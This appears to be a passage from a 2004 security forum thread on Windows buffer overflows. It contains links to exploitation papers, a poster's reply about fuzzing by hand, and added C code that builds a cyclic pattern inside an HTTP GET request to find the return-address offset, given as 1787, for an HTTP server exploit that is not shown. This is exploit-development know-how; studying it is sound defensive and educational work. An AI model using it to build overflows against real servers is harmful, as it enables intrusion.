- Understanding Windows Shellcode http://www.hick.org/code/skape/papers/win32-shellcode.pdf
- Very nice collection of papers http://www.subterrain.net/overflow-papers/
- Site with basic but nice explanation of shellcodes and BOs http://www.delikon.de
- Shitload of explanation about several exploitation techniques http://community.corest.com/~juliano/
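One way to get the "control of EIP" number DiabloPatch describes, as an added example that is not part of the original post: instead of a run of 'A's, send a pattern in which every 4-byte window is unique, read EIP from the debugger at the crash, and look those 4 bytes up in the pattern. The index found that way is the number of bytes before the saved return address, which the exploit above hard-codes as 1787. The Aa0Aa1... scheme is the one Metasploit's pattern_create/pattern_offset use; the request framing assumes the same "GET ... HTTP/1.1" line the exploit sends, and the pattern is alphanumeric, so it never contains a byte the request line would choke on.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATTERN_MAX (26 * 26 * 10 * 3)   /* 20280 bytes before the pattern repeats */

/* Fill out with the first n bytes of the Aa0Aa1...Zz9 pattern; returns n
 * capped at PATTERN_MAX. Within that length every 4-byte window is unique. */
size_t pattern_create(char *out, size_t n)
{
    size_t i = 0;
    if (n > PATTERN_MAX) n = PATTERN_MAX;
    for (char u = 'A'; u <= 'Z' && i < n; u++)
        for (char l = 'a'; l <= 'z' && i < n; l++)
            for (char d = '0'; d <= '9' && i < n; d++) {
                const char t[3] = { u, l, d };
                for (int k = 0; k < 3 && i < n; k++) out[i++] = t[k];
            }
    return i;
}

/* Little-endian dword at offset off of the pattern: the value EIP holds
 * when the saved return address was overwritten by pattern bytes there. */
uint32_t pattern_dword_at(size_t off)
{
    static char pat[PATTERN_MAX];
    pattern_create(pat, sizeof pat);
    if (off + 4 > sizeof pat) return 0;
    const unsigned char *p = (const unsigned char *)pat + off;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Inverse: given the crash EIP, return the offset of those 4 bytes in the
 * pattern, or -1 if EIP did not come from the pattern (e.g. 0x41414141). */
long pattern_offset(uint32_t eip)
{
    static char pat[PATTERN_MAX];
    size_t n = pattern_create(pat, sizeof pat);
    unsigned char needle[4] = {
        (unsigned char)(eip & 0xff), (unsigned char)((eip >> 8) & 0xff),
        (unsigned char)((eip >> 16) & 0xff), (unsigned char)((eip >> 24) & 0xff)
    };
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* "GET <pattern> HTTP/1.1\r\n\r\n" with a patlen-byte pattern, the same
 * framing the exploit uses. Returns the request length, 0 on overflow. */
size_t pattern_request(char *out, size_t cap, size_t patlen)
{
    const char *head = "GET ", *tail = " HTTP/1.1\r\n\r\n";
    if (patlen > PATTERN_MAX || strlen(head) + patlen + strlen(tail) + 1 > cap) return 0;
    size_t n = strlen(head);
    memcpy(out, head, n);
    n += pattern_create(out + n, patlen);
    memcpy(out + n, tail, strlen(tail));
    n += strlen(tail);
    out[n] = 0;
    return n;
}

/* Demo request a bit longer than the exploit's overflow. */
size_t demo_request_len(void)
{
    static char buf[4096];
    return pattern_request(buf, sizeof buf, 2300);
}

int main(void)
{
    /* Pretend the debugger showed EIP = the pattern bytes at offset 1787. */
    uint32_t eip = pattern_dword_at(1787);
    printf("request length %zu, EIP=0x%08x -> offset %ld\n",
           demo_request_len(), eip, pattern_offset(eip));
    return 0;
}
```

A crash with EIP = 0x41414141 tells you only that EIP was overwritten; the pattern tells you where in the input the 4 bytes came from, and pattern_offset() returning -1 means the value did not come from your input at all (a partial overwrite, or a pointer the program computed), which is worth knowing before you start placing a return address.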
101
Nov 12 2004, 01:59 PM
QUOTE(DiabloPatch @ Nov 12 2004, 01:23 AM) Well, nice exploits, but it would also be nice to tell them how you learn such things. Knowledge should be for everyone.
DiabloHorn, there is no need to explain what is already perfectly explained in tons of public papers.... I think until now I have spread enough clear code to be understood.... The guys telling me to write something are just too lazy themselves to start learning C, asm and exploit coding. What I'm not doing as in the papers is the fuzzing technique, which I do manually as I already said, because I'm sure to find more holes that way than by using a tool to detect them. That's all. bye